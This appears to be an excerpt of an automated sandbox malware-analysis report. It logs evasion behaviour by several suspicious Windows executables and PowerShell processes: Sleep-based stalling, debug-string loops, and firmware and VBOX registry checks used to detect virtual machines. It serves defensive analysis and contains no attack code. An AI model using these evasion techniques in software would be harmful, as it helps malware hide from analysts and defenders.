Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\ProgramData\Program\iusb3mon.exe

Stalling execution: Execution stalls by calling Sleep

graph_33-35683

Query firmware table information (likely to detect VMs)

Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	System information queried: FirmwareTableInformation
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	System information queried: FirmwareTableInformation
Source: C:\ProgramData\Program\iusb3mon.exe	System information queried: FirmwareTableInformation
Source: C:\ProgramData\Program\iusb3mon.exe	System information queried: FirmwareTableInformation

Tries to delay execution (extensive OutputDebugStringW loop)

Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: OutputDebugStringW count: 275
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Section loaded: OutputDebugStringW count: 1926

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\Program\iusb3mon.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Source: C:\ProgramData\Program\iusb3mon.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\ProgramData\Program\iusb3mon.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\ProgramData\Program\iusb3mon.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4882	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3506	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5054	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1167	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4333	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2113	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4527	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 997	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1508
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Window / User API: threadDelayed 431
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Window / User API: threadDelayed 6856
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1841
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1488
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2652
Source: C:\ProgramData\Program\iusb3mon.exe	Window / User API: threadDelayed 2113
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3970
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 784
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4113
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 397
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2896
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2732
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 355
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1822
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5359
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3655
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3874
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4456
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1317
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5715
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 834
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3873
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 634
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5074
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4470
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2119
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1180
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 939
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 793
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 779
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 971
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 886
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 799
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1013
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 962
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 825
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 963
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 834
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 753
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 945

Source: C:\ProgramData\Program\iusb3mon.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_33-35664

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Dropped PE file which has not been started: C:\Program Files\product1\letsvpn-latest.exe

Jump to dropped file

Source: C:\ProgramData\Program\iusb3mon.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

graph_33-35608

Source: C:\Users\user\Desktop\KL-3.1.16.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-3248

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

API coverage: 5.3 %

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe TID: 5388	Thread sleep time: -110000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5156	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4544	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6084	Thread sleep count: 5054 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6084	Thread sleep count: 1167 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5532	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1804	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6124	Thread sleep count: 4333 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 760	Thread sleep count: 2113 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5064	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2572	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5920	Thread sleep count: 4527 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2544	Thread sleep count: 997 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6924	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6888	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2960	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5912	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe TID: 992	Thread sleep count: 66 > 30
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe TID: 992	Thread sleep time: -66000s >= -30000s
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe TID: 1764	Thread sleep count: 208 > 30
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe TID: 1764	Thread sleep time: -41600s >= -30000s
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe TID: 3688	Thread sleep count: 431 > 30
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe TID: 3688	Thread sleep time: -1293000s >= -30000s
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe TID: 340	Thread sleep count: 167 > 30
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe TID: 340	Thread sleep time: -33400s >= -30000s
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe TID: 3688	Thread sleep count: 6856 > 30
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe TID: 3688	Thread sleep time: -20568000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 356	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6504	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6700	Thread sleep count: 1841 > 30
